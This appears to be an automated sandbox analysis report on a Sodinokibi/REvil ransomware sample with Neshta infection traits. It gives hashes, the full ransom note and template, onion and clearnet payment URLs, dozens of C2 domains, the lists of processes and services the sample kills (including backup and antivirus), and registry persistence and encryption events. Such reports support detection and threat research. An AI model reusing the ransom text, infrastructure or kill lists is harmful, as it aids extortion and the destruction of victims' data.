d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
207KB
24-01-2022 01:09
behavioral1
MD5 | 8af4a97a5a07807277a02eb69a859120 |
SHA1 | c9752d458c840ea4585efcdd16bbb5bf1a05ac44 |
SHA256 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424 |
SHA512 | c9e79390acf6245bb7936df92bf7bf560266c262199abb586a5d8f14d320a17a5a8ec3ff97efaeab11a12dc252f2fa2aaa185947faf40620b79a3bd3b4a8d393 |
Extracted
Path | C:\7x8f6ued-readme.txt |
Family | sodinokibi |
Ransom Note |
---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 7x8f6ued.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
[+] How to get access on website? [+]
You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2377B5A9E37B39BA
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.cc/2377B5A9E37B39BA
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form:
Key:
-----------------------------------------------------------------------------------------
!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
|
URLs |
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2377B5A9E37B39BA http://decryptor.cc/2377B5A9E37B39BA |
Extracted
Family | sodinokibi |
Botnet | $2a$10$EWjSpd.R6SAti4bgJBSw9er8oKv3V7/QblFqIXtPzaY2HzBNCquva |
Campaign | 3178 |
C2 |
tinyagency.com oldschoolfun.net anthonystreetrimming.com botanicinnovations.com thefixhut.com polymedia.dk reddysbakery.com kindersitze-vergleich.de theapifactory.com partnertaxi.sk deschl.net gw2guilds.org smartypractice.com restaurantesszimmer.de vitavia.lt advizewealth.com edelman.jp fibrofolliculoma.info zweerscreatives.nl almosthomedogrescue.dog charlesreger.com manijaipur.com blog.solutionsarchitect.guru the-virtualizer.com fairfriends18.de tennisclubetten.nl body-armour.online aarvorg.com rumahminangberdaya.com sw1m.ru macabaneaupaysflechois.com themadbotter.com maasreusel.nl jadwalbolanet.info advokathuset.dk walter-lemm.de securityfmm.com smhydro.com.pl citymax-cr.com solinegraphic.com abogadoengijon.es jiloc.com ziegler-praezisionsteile.de argenblogs.com.ar aprepol.com petnest.ir wasmachtmeinfonds.at answerstest.ru imperfectstore.com nakupunafoundation.org |
Attributes |
net true
pid $2a$10$EWjSpd.R6SAti4bgJBSw9er8oKv3V7/QblFqIXtPzaY2HzBNCquva
prc winword excel visio oracle isqlplussvc firefox dbeng50 mspub xfssvccon encsvc dbsnmp thebat mydesktopservice sql steam wordpad infopath agntsvc synctime outlook ocautoupds onenote sqbcoreservice ocomm tbirdconfig thunderbird msaccess powerpnt ocssd mydesktopqos
ransom_oneliner All of your files are encrypted!
Find {EXT}-readme.txt and follow instuctions
ransom_template ---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
[+] How to get access on website? [+]
You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.cc/{UID}
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form:
Key:
{KEY}
-----------------------------------------------------------------------------------------
!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
sub 3178
svc memtas mepocs backup sophos sql svc$ vss veeam |
Modifies system executable filetype association
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Tags
TTPs
Reported IOCs
description | ioc | process |
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
-
Neshta
Description
Malware from the Neshta family is a file infector: it inserts itself into other executable files in order to spread and cause damage.
Tags
-
Sodin,Sodinokibi,REvil
Description
Ransomware with advanced anti-analysis and privilege escalation functionality.
Tags
-
Executes dropped EXE
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
pid | process |
544 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
-
Modifies extensions of user files
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Description
Ransomware generally changes the extension on encrypted files.
Tags
Reported IOCs
description | ioc | process |
File opened for modification | \??\c:\users\admin\pictures\CompleteRestart.tiff | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\users\admin\pictures\PushRemove.tiff | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\users\admin\pictures\StopSet.tiff | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\users\admin\pictures\WatchSet.tiff | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File renamed | C:\Users\Admin\Pictures\JoinDeny.crw => \??\c:\users\admin\pictures\JoinDeny.crw.7x8f6ued | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\users\admin\pictures\ResolveExit.tiff | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File renamed | C:\Users\Admin\Pictures\MeasureStep.raw => \??\c:\users\admin\pictures\MeasureStep.raw.7x8f6ued | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File renamed | C:\Users\Admin\Pictures\ResolveExit.tiff => \??\c:\users\admin\pictures\ResolveExit.tiff.7x8f6ued | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\users\admin\pictures\UnlockCheckpoint.tiff | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File renamed | C:\Users\Admin\Pictures\BackupResolve.png => \??\c:\users\admin\pictures\BackupResolve.png.7x8f6ued | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File renamed | C:\Users\Admin\Pictures\InstallConvertTo.raw => \??\c:\users\admin\pictures\InstallConvertTo.raw.7x8f6ued | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File renamed | C:\Users\Admin\Pictures\CompleteRestart.tiff => \??\c:\users\admin\pictures\CompleteRestart.tiff.7x8f6ued | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File renamed | C:\Users\Admin\Pictures\StopSet.tiff => \??\c:\users\admin\pictures\StopSet.tiff.7x8f6ued | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File renamed | C:\Users\Admin\Pictures\PushRemove.tiff => \??\c:\users\admin\pictures\PushRemove.tiff.7x8f6ued | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File renamed | C:\Users\Admin\Pictures\UnlockCheckpoint.tiff => \??\c:\users\admin\pictures\UnlockCheckpoint.tiff.7x8f6ued | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File renamed | C:\Users\Admin\Pictures\WatchSet.tiff => \??\c:\users\admin\pictures\WatchSet.tiff.7x8f6ued | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
-
Loads dropped DLL
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
pid | process |
1588 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
1588 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
1588 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
-
Reads user/profile data of web browsers
Description
Infostealers often target stored browser data, which can include saved credentials and other sensitive profile contents.
Tags
TTPs
-
Adds Run key to start application
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Tags
TTPs
Reported IOCs
description | ioc | process |
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\k51299BQXH = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe" | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
-
Enumerates connected drives
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Description
Attempts to read the root path of hard drives other than the default C: drive.
TTPs
Reported IOCs
description | ioc | process |
File opened (read-only) | \??\G: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\I: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\K: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\M: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\N: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\Q: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\U: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\E: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\S: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\T: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\V: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\W: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\X: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\P: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\B: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\J: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\L: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\O: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\Y: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\D: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\A: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\H: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\R: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\Z: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened (read-only) | \??\F: | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
-
Drops file in System32 directory
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
description | ioc | process |
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
-
Sets desktop wallpaper using registry
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Tags
TTPs
Reported IOCs
description | ioc | process |
Set value (str) | \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\93hmz.bmp" | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
-
Drops file in Program Files directory
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe, d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
description | ioc | process |
File opened for modification | C:\PROGRA~2\Google\Update\1336~1.71\GOBD5D~1.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\ConnectMove.ppsm | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\ink\mip.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\FLTLDR.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\SOURCE~1\OSE.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\TextConv\WksConv\Wkconv.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\DW\DWTRIG20.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\ConvertToMerge.ram | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\PushStart.mp4 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\FindImport.AAC | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\PushUse.jfif | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\ResumeSend.crw | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~1.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~2.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MICROS~1\Office14\MSTORDB.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MICROS~1\Office14\OIS.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MICROS~1\Office14\SELFCERT.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MICROS~1\Office14\MSOHTMED.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\COMMON~1\ADOBEA~1\Versions\1.0\ADOBEA~1.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\INTERN~1\ielowutil.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\ApproveRead.vssm | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\RevokeSet.m3u | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MICROS~1\Office14\1033\ONELEV.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\OpenInstall.xla | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\LICLUA.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\INTERN~1\ieinstal.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\WI54FB~1\wmplayer.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File created | \??\c:\program files\7x8f6ued-readme.txt | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\DW\DW20.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MICROS~1\Office14\MSQRY32.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MICROS~1\Office14\PPTICO.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\TestLimit.pptx | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\UnblockBlock.vstm | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOICONS.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File created | \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\7x8f6ued-readme.txt | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MICROS~1\Office14\IECONT~1.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MICROS~1\Office14\INFOPATH.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\WINDOW~1\WinMail.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\StopCheckpoint.pcx | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\ODeploy.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MICROS~1\Office14\ACCICONS.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\RepairEdit.xlsb | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\Adobe\READER~1.0\Reader\AcroRd32.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\WINDOW~1\wabmig.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File created | \??\c:\program files (x86)\microsoft sql server compact edition\7x8f6ued-readme.txt | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MICROS~1\Office14\ONENOTEM.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\LockProtect.mp3 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\Setup.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MOZILL~1\UNINST~1.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\EnterRedo.M2V | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\RestoreInstall.fon | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOXMLED.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\WI54FB~1\wmpconfig.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | \??\c:\program files\UndoSync.mht | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File created | \??\c:\program files (x86)\7x8f6ued-readme.txt | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File created | \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\7x8f6ued-readme.txt | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBE_~1.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\Google\Update\1336~1.71\GOOGLE~3.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\Google\Update\1336~1.71\GOF5E2~1.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
File opened for modification | C:\PROGRA~2\MICROS~1\Office14\ONENOTE.EXE | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
-
Drops file in Windows directory
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
description | ioc | process |
File opened for modification | C:\Windows\svchost.com | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
-
Enumerates physical storage devices
Description
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
TTPs
-
Modifies registry class
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
description | ioc | process |
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
-
Suspicious behavior: EnumeratesProcesses
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe, powershell.exe
Reported IOCs
pid | process |
544 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
1520 | powershell.exe |
-
Suspicious use of AdjustPrivilegeToken
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe, powershell.exe, vssvc.exe
Reported IOCs
description | pid | process |
Token: SeDebugPrivilege | 544 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
Token: SeDebugPrivilege | 1520 | powershell.exe |
Token: SeBackupPrivilege | 1632 | vssvc.exe |
Token: SeRestorePrivilege | 1632 | vssvc.exe |
Token: SeAuditPrivilege | 1632 | vssvc.exe |
-
Suspicious use of WriteProcessMemory
Processes: d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe, d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe
Reported IOCs
description | pid | process | target process |
PID 1588 wrote to memory of 544 | 1588 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
PID 1588 wrote to memory of 544 | 1588 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
PID 1588 wrote to memory of 544 | 1588 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
PID 1588 wrote to memory of 544 | 1588 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe |
PID 544 wrote to memory of 1520 | 544 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe | powershell.exe |
PID 544 wrote to memory of 1520 | 544 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe | powershell.exe |
PID 544 wrote to memory of 1520 | 544 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe | powershell.exe |
PID 544 wrote to memory of 1520 | 544 | d62240e4e9af350be38acaa7d0fb3d9d99224b5afb73130bfedd1d8ed913a424.exe | powershell.exe |
-
